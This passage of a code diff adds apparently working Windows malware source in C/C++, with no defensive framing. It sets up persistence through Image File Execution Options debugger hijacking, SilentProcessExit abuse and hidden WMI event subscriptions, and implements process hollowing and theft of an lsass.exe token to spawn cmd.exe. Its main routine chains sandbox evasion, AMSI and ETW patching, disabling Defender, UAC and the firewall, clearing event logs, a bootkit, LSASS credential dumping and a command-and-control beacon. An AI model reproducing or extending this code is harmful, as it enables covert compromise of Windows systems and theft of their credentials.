L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\svchost.exe", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + wchar_t debugger[MAX_PATH]; + GetModuleFileNameW(NULL, debugger, MAX_PATH); + RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t))); + RegCloseKey(hKey); + } + if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + wchar_t debugger[MAX_PATH]; + GetModuleFileNameW(NULL, debugger, MAX_PATH); + RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t))); + RegCloseKey(hKey); + } + if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\svchost.exe", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { + DWORD flags = 0x2; + RegSetValueExW(hKey, L"MitigationOptions", 0, REG_BINARY, (BYTE*)&flags, sizeof(flags)); + wchar_t monitorPath[MAX_PATH]; + GetModuleFileNameW(NULL, monitorPath, MAX_PATH); + RegSetValueExW(hKey, L"MonitorProcess", 0, REG_SZ, (BYTE*)monitorPath, (DWORD)(wcslen(monitorPath) * sizeof(wchar_t))); + RegCloseKey(hKey); + } + InstallServicePersistence(); + AddToStartup(cmd); +} + +void AddWmiPersistence() { + wchar_t exePath[MAX_PATH]; + GetModuleFileNameW(NULL, exePath, MAX_PATH); + wchar_t psCmd[4096]; + swprintf(psCmd, 4096, L"powershell -Command \"$filterArgs=@{Name='StartupFilter';EventNameSpace='root\\cimv2';QueryLanguage='WQL';Query=\\\"SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='explorer.exe'\\\"}; $filter=Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments $filterArgs -ErrorAction SilentlyContinue; $consumerArgs=@{Name='StartupConsumer';CommandLineTemplate='%ls'}; $consumer=Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\\subscription -Arguments $consumerArgs -ErrorAction SilentlyContinue; $bindingArgs=@{Filter=$filter; Consumer=$consumer}; Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\\subscription -Arguments $bindingArgs -ErrorAction SilentlyContinue; $filterTimerArgs=@{Name='TimerFilter';EventNameSpace='root\\cimv2';QueryLanguage='WQL';Query=\\\"SELECT * FROM __TimerEvent WHERE TimerID='ChurchTimer'\\\"}; $filterTimer=Set-WmiInstance -Class __EventFilter -Namespace root\\subscription -Arguments $filterTimerArgs -ErrorAction SilentlyContinue; $consumerTimerArgs=@{Name='TimerConsumer';CommandLineTemplate='%ls'}; $consumerTimer=Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\\subscription -Arguments $consumerTimerArgs -ErrorAction SilentlyContinue; $bindingTimerArgs=@{Filter=$filterTimer; Consumer=$consumerTimer}; Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\\subscription -Arguments $bindingTimerArgs -ErrorAction SilentlyContinue\"", exePath, exePath); + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessW(NULL, psCmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (pi.hProcess) { WaitForSingleObject(pi.hProcess, 10000); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } +} + +// ==================== PROCESS HOLLOWING ==================== +BOOL ProcessHollowing(LPCWSTR targetProcess, LPCWSTR payloadPath) { + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + if (!CreateProcessW(targetProcess, NULL, NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) + return FALSE; + HANDLE hFile = CreateFileW(payloadPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); + if (hFile == INVALID_HANDLE_VALUE) { TerminateProcess(pi.hProcess, 0); return FALSE; } + DWORD fileSize = GetFileSize(hFile, NULL); + BYTE* peData = (BYTE*)malloc(fileSize); + if (!peData) { CloseHandle(hFile); TerminateProcess(pi.hProcess, 0); return FALSE; } + DWORD bytesRead; + ReadFile(hFile, peData, fileSize, &bytesRead, NULL); + CloseHandle(hFile); + CONTEXT ctx = { CONTEXT_FULL }; + GetThreadContext(pi.hThread, &ctx); + NtUnmapViewOfSection(pi.hProcess, (PVOID)ctx.Rdx); + PVOID imageBase = NULL; + DWORD_PTR pebAddr = 0; + NTSTATUS status = NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pebAddr, sizeof(pebAddr), NULL); + if (status == 0) { + PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)peData; + PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(peData + pDos->e_lfanew); + imageBase = VirtualAllocEx(pi.hProcess, (LPVOID)pNt->OptionalHeader.ImageBase, pNt->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + if (!imageBase) { + imageBase = VirtualAllocEx(pi.hProcess, NULL, pNt->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + } + if (imageBase) { + WriteProcessMemory(pi.hProcess, imageBase, peData, pNt->OptionalHeader.SizeOfHeaders, NULL); + for (int i = 0; i < pNt->FileHeader.NumberOfSections; i++) { + PIMAGE_SECTION_HEADER pSec = (PIMAGE_SECTION_HEADER)((BYTE*)pNt + sizeof(IMAGE_NT_HEADERS) + i * sizeof(IMAGE_SECTION_HEADER)); + WriteProcessMemory(pi.hProcess, (LPVOID)((DWORD_PTR)imageBase + pSec->VirtualAddress), peData + pSec->PointerToRawData, pSec->SizeOfRawData, NULL); + } + } + } + free(peData); + ResumeThread(pi.hThread); + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + return TRUE; +} + +// ==================== TOKEN STEALING ==================== +BOOL TokenStealing() { + DWORD systemPid = 0; + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot != INVALID_HANDLE_VALUE) { + PROCESSENTRY32W pe = { sizeof(pe) }; + if (Process32FirstW(snapshot, &pe)) { + do { if (_wcsicmp(pe.szExeFile, L"lsass.exe") == 0) { systemPid = pe.th32ProcessID; break; } } while (Process32NextW(snapshot, &pe)); + } + CloseHandle(snapshot); + } + if (!systemPid) return FALSE; + EnableDebugPrivilege(); + HANDLE hLsass = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, systemPid); + if (!hLsass) return FALSE; + HANDLE hToken; + if (!OpenProcessToken(hLsass, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, &hToken)) { + CloseHandle(hLsass); + return FALSE; + } + HANDLE hDupToken; + if (!DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hDupToken)) { + CloseHandle(hToken); + CloseHandle(hLsass); + return FALSE; + } + STARTUPINFOW si = { sizeof(si) }; + PROCESS_INFORMATION pi; + CreateProcessWithTokenW(hDupToken, 0, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &si, &pi); + CloseHandle(hDupToken); + CloseHandle(hToken); + CloseHandle(hLsass); + return TRUE; +} + +// ==================== MAIN ==================== +int main() { + srand((unsigned int)(GetTickCount64() ^ (ULONGLONG)&main)); + InitObfuscatedStrings(); + InitNtFunctions(); + if (!EnsureSingleInstance()) return 0; + ParseC2Server(); + if (IsSandboxed()) return 0; + ElevateSelf(); + PatchEtw(); + PatchAmsi(); + EnableDebugPrivilege(); + if (DisableTamperProtection()) Sleep(3000); + DisableDefender(); + KillDefenderProcesses(); + DisableUAC(); + DisableAppLockerWDAC(); + AddDefenderExclusions(); + DisableSecurityLogs(); + DisableSystemRestore(); + DropTelemetryPackets(); + ClearEventLogs(); + ScrambleMemory(); + AddPersistence(); + AddWmiPersistence(); + InstallBootkitComponents(); + StopSecurityServices(); + DisableFirewall(); + DumpLSASS(); + EnableKernelExecution(); + RunAsPPL(); + TokenStealing(); + NetworkC2Setup(); // THIS STARTS THE C2 BEACON - FULLY INTEGRATED + HideFile(L"C:\\lsass.dmp"); + return 0; +}